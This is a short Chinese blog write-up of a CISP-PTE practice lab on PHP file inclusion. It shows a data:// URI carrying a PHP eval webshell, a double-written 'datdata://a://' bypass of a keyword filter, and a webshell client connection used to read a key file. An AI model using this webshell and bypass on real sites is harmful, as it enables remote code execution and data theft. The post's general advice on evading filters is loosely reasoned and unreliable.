CISP-PTE 文件包含

题:http://121.41.79.208:83/start/index.php?page=hello

Data URI scheme(data: base64)协议常用数据格式
data:<文本数据>
data:text/plain,<文本数据>
data:text/html,<HTML代码>
data:text/html;base64,<base64编码的HTML代码>
data:text/css,<CSS代码>
data:text/css;base64,<base64编码的CSS代码>
data:text/javascript,<]avascript代码>
data:text/javascript;base64,<base64编码的]avascript代码>
data:image/gif;base64,base64编码的gif图片数据
data:image/png;base64,base64编码的icon图片数据
data:image/jpeg;base64,base64编码的jpeg图片数据
data:image/x-icon;base64,base64编码的icon图片数据

1、尝试使用data协议,发现php被过滤掉了

data://text/plain,<?php @eval($_POST['cmd']);?>


2、查看页面源代码,发现data://替换成了空,其余的都在,data://被注释了


3、双写datdata://a://

data协议是一种用于在URL中传递数据的协议,它可以将数据以base64编码的形式嵌入到URL中。然而,由于安全性的考虑,许多浏览器和服务器会对data协议进行过滤,防止恶意代码的执行。
要绕过data协议的过滤,可以尝试以下方法:
1.使用其他协议:可以考虑使用其他协议来传递数据,如http或https协议。这些协议通常不会被过滤。
2.使用URL编码:将数据进行URL编码,然后再传递。URL编码可以将特殊字符转换为%xx的形式,使其不被解析为恶意代码。
3.使用其他编码方式:除了base64编码外,还可以尝试其他编码方式,如hex编码或者自定义的编码方式。这样可以绕过对base64编码的过滤。
http://121.41.79.208:83/start/index.php?page=datdata://a://text/plain,
<?php
@eval($_POST['cmd']);
?>


4、将地址放入蚁剑或菜刀中连接


5、进入文件管理,找到html目录,找到key,拿到值

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小野猪都有白菜拱

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值